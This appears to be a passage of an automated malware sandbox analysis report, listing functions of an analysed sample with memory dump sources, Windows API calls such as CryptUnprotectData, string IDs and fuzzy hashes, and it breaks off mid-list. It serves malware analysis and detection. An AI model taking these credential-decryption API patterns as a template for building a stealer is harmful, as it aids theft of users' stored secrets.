                          • wsprintfA.USER32 ref: 00177AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: de6976c4a70368e3137d2e332445a5b06be39830bcf8a425bf3738c6eab87a89
                          • Instruction ID: b6a2ba8fd01db4d9512b28dc161b9628db685fa48f4ed768b5be5280cda5ad4e
                          • Opcode Fuzzy Hash: de6976c4a70368e3137d2e332445a5b06be39830bcf8a425bf3738c6eab87a89
                          • Instruction Fuzzy Hash: CE117CB1945618EBEB218B54DC49FA9BBBCFB05721F10469AE90AA32C0C7785A40CF91
                          Function 0053459E Relevance: 5.3, Strings: 3, Instructions: 1557COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;&n;$icuY$|E
                          • API String ID: 0-969125757
                          • Opcode ID: 4e967870f6c73012619de36909d5b835f1fb5361eabfedf3b1abe678f8e26313
                          • Instruction ID: 4482a9c4601e0ff35765f2ac9f1c1d6ed506495869bd186c375a6caa25eb150f
                          • Opcode Fuzzy Hash: 4e967870f6c73012619de36909d5b835f1fb5361eabfedf3b1abe678f8e26313
                          • Instruction Fuzzy Hash: 84A2E6F350C204AFE3046E29EC85A7AF7E9EF94720F1A493DE6C5C3744EA7558018697
                          Function 00173720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0017E118,00000000,00000001,0017E108,00000000), ref: 00173758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001737B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 6e12b029384ff96701367e6b825f630e28cf0ea0ea3f4a9a003baa1598a414a1
                          • Instruction ID: 66c0bc0ccde033f081e5e5f15be3226e1f0d05208f755fea4f4901c9a664548e
                          • Opcode Fuzzy Hash: 6e12b029384ff96701367e6b825f630e28cf0ea0ea3f4a9a003baa1598a414a1
                          • Instruction Fuzzy Hash: 65410A71A40A289FDB24DB58CC95B9BB7B4BB48702F4082D8E618EB2D0D7716E85CF51
                          Function 00169B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00169B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00169BA3
                          • LocalFree.KERNEL32(?), ref: 00169BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: ebd7c688424c7be8ad83ce0e46b5adfd27923ee5ba2beb4be5fa82b015dd0616
                          • Instruction ID: d8499089bea46efd5ae00634cbc8a7bda5eb7044b6bd8a2668786b2c14f4fbd6
                          • Opcode Fuzzy Hash: ebd7c688424c7be8ad83ce0e46b5adfd27923ee5ba2beb4be5fa82b015dd0616
                          • Instruction Fuzzy Hash: 3911C9B9A00209EFDB05DF94D985EAE77B9FF89300F104598E915A7350D774AE10CFA1
                          Function 0052F434 Relevance: 4.1, Strings: 2, Instructions: 1556COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7u$E__
                          • API String ID: 0-1400097245
                          • Opcode ID: 45f21e09f8b388cade121e9f3c2bdcaedd3a3205c1aef839f8643ae6857f4f0f
                          • Instruction ID: 158df46215ed76a499d57d99e871cf91038ddc3690aca661c31972a252a3f5e2
                          • Opcode Fuzzy Hash: 45f21e09f8b388cade121e9f3c2bdcaedd3a3205c1aef839f8643ae6857f4f0f
                          • Instruction Fuzzy Hash: DBB2F3F3A0C2149FE3046E2DEC8567ABBE9EF94720F16493DEAC4C7740E63558058697
                          Function 00617961 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: hSs
                          • API String ID: 0-2329652023
                          • Opcode ID: 72bd31faa65dd65a9e96c6b5c49cec1db4b9ce8c1285dd79fc2137ae8b66b307
                          • Instruction ID: 8b1d5f20d31ffa512243ae330fad98d6a590f2b37385616e3f782c4e3b39c380
                          • Opcode Fuzzy Hash: 72bd31faa65dd65a9e96c6b5c49cec1db4b9ce8c1285dd79fc2137ae8b66b307
                          • Instruction Fuzzy Hash: ED51EBF390C510DBE704AE29DC056BAB7B6EB94310F2A493DD9C6C7304EA319996D783
                          Function 0047F458 Relevance: .2, Instructions: 213COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d44e706bf4adfe1d2390d363b89246fcf98b217e92812db8c3b54fa5a6dada7
                          • Instruction ID: d7e604511c13aa8cb5ed6f2e6796657960acd338171e427f12d76152b21f58a6
                          • Opcode Fuzzy Hash: 0d44e706bf4adfe1d2390d363b89246fcf98b217e92812db8c3b54fa5a6dada7
                          • Instruction Fuzzy Hash: DB61F5B370C2009FE344AE2DEC9577ABBD6EBD8320F16463DEA84C7384E93598058756
                          Function 004005E0 Relevance: .2, Instructions: 210COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a01c8644d1e825b4cb0f01d7e3c111611c26ac17a04131a7c41e7569d8d7b5c1
                          • Instruction ID: cd13005879f295b5e106be3ec6c1194b5095c6dff8a6878c1f7f7f7fe9fadd6a
                          • Opcode Fuzzy Hash: a01c8644d1e825b4cb0f01d7e3c111611c26ac17a04131a7c41e7569d8d7b5c1
                          • Instruction Fuzzy Hash: 5861F7B3E096108FE3056E29DC8576AFBE2EFD4310F1A893CDAC897744D639584487C2
                          Function 0052CFE6 Relevance: .2, Instructions: 202COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 819d4d6fe693eae5333f260afb1c62f3bbb2bcdfd5016438998a881381bd571e
                          • Instruction ID: dbe7c038cd56e1d6cb8df7285f540c18c3a0f2eefbf03e4d8750f2a21647373e
                          • Opcode Fuzzy Hash: 819d4d6fe693eae5333f260afb1c62f3bbb2bcdfd5016438998a881381bd571e
                          • Instruction Fuzzy Hash: AD51F6B361C2049FE704AE6DECC562AFBE8EF54220F16492DEAC4C7744E67499418B93
                          Function 004415CB Relevance: .2, Instructions: 170COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3f13088c0ac8acf7ccbe7ea413d0496ee2e0e0c9e91a35a5e9777565246dfc9
                          • Instruction ID: 6dd4078acc523f2b610cedfde98742f5ab28eb517d6600a9a6b985ce884fbce7
                          • Opcode Fuzzy Hash: c3f13088c0ac8acf7ccbe7ea413d0496ee2e0e0c9e91a35a5e9777565246dfc9
                          • Instruction Fuzzy Hash: C151E5F3A086149BE3047E5DDC8577AF7EAEF98721F16463DE7C483780E97458008696
                          Function 00501486 Relevance: .2, Instructions: 169COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 090a4fdf8302d7acddd908eb3e543b9805888f7b16fd88e41f00bf92acfae766
                          • Instruction ID: 24ced8d789901eebf03632b02634038c9f693f21a93470150ac21d3261ca3784
                          • Opcode Fuzzy Hash: 090a4fdf8302d7acddd908eb3e543b9805888f7b16fd88e41f00bf92acfae766
                          • Instruction Fuzzy Hash: 80516AF3A083044FF3086F29EC5577AB3D5EB90320F2A463DDA8997780F97E68058246
                          Function 0050973D Relevance: .1, Instructions: 109COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e203f81b10b3f2e986dc6414f7d2b32159e8e9c77a3a500965a11bd25a2cea37
                          • Instruction ID: b66bc3d97674733041ba43f7b3a6ba0de7aa52e3338f410db9b88cbad7abf98c
                          • Opcode Fuzzy Hash: e203f81b10b3f2e986dc6414f7d2b32159e8e9c77a3a500965a11bd25a2cea37
                          • Instruction Fuzzy Hash: DD31B3F3E452104BF305692DDC4576AB6CAABD4720F1B823D9E98973C5ED7D5C064182
                          Function 00179750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
